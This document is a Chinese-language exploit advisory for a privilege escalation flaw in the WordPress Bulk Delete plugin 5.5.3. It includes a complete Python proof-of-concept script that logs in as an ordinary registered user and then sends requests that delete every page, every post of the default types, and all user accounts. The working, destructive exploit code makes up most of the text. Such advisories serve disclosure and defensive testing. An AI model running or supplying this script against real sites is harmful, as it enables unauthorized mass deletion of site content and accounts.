WordPress Bulk Delete Plugin 5.5.3 -权限提升

  • 漏洞标题:WordPress的批量删除插件[特权升级]
  • 发现日期:2016年2月10日
  • 漏洞作者:Panagiotis Vagenas
  • 软件链接:https://wordpress.org/plugins/bulk-delete/
  • 版本:5.5.3
  • 测试上:WordPress的4.4.2
  • 类别:WebApps,WordPress

描述:

任何用户都可以通过_Bulk DELETE_提供的任务管理进行提升权限,但是不能操作所有部分分别支持如下部分

  • bd_delete_pages_by_status:通过删除所有状态页面
  • bd_delete_posts_by_post_type:删除按类型的所有帖子
  • bd_delete_users_by_meta:删除所有特定用户的meta值

网站注册的任何用户都可以通过这个漏洞执行bd_action ,所以是一个权限提升漏洞

下面是漏洞测试POC:

#!/usr/bin/python3

################################################################################
# Bulk Delete Privilege Escalation Exploit
#
# **IMPORTANT** Don't use this in a production site, if vulnerable it will
# delete nearly all your sites content
#
# Author: Panagiotis Vagenas <[email protected]>
################################################################################

import requests

loginUrl = 'http://example.com/wp-login.php'
adminUrl = 'http://example.com/wp-admin/index.php'

loginPostData = {
'log': 'username',
'pwd': 'password',
'rememberme': 'forever',
'wp-submit': 'Log+In'
}

l = requests.post(loginUrl, data=loginPostData)

if l.status_code != 200 or len(l.history) == 0 or
len(l.history[0].cookies) == 0:
print("Couldn't acquire a valid session")
exit(1)

loggedInCookies = l.history[0].cookies

def do_action(action, data):
try:
requests.post(
adminUrl + '?bd_action=' + action,
data=data,
cookies=loggedInCookies,
timeout=30
)
except TimeoutError:
print('Action ' + action + ' timed out')
else:
print('Action ' + action + ' performed')

print('Deleting all pages')
do_action(
'delete_pages_by_status',
{
'smbd_pages_force_delete': 'true',
'smbd_published_pages': 'published_pages',
'smbd_draft_pages': 'draft_pages',
'smbd_pending_pages': 'pending_pages',
'smbd_future_pages': 'future_pages',
'smbd_private_pages': 'private_pages',
}
)

print('Deleting all posts from all default post types')
do_action('delete_posts_by_post_type', {'smbd_types[]': [
'post',
'page',
'attachment',
'revision',
'nav_menu_item'
]})

print('Deleting all users')
do_action(
'delete_users_by_meta',
{
'smbd_u_meta_key': 'nickname',
'smbd_u_meta_compare': 'LIKE',
'smbd_u_meta_value': '',
}
)

exit(0)

代码具有攻击性,请遵守当地法律法规。